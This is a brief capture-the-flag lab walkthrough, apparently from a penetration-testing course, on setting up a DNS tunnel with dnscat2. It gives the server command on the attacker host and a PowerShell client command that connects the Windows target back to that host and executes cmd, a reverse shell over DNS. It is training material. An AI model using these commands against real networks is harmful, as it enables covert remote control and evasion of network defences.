Skip to content

DNS Tunneling with Dnscat2

ℹ️ Informations

Question

Using the concepts taught in this section, connect to the target and establish a DNS Tunnel that provides a shell session. Submit the contents of C:\Users\htb-student\Documents\flag.txt as the answer.

📋 Walkthrough

Use provided creds to login into rdp. Download dnscat2 on target, ope server on your machine 

sudo ruby dnscat2.rb --dns host=10.10.14.74,port=53,domain=inlanefreight.local --no-cache
Then start a client connection 
 Start-Dnscat2 -DNSserver 10.10.14.74 -Domain inlanefreight.local -PreSharedSecret 97048045751c991e12b0d2935c21dfa4 -Exec cmd

Answer

[REDACTED]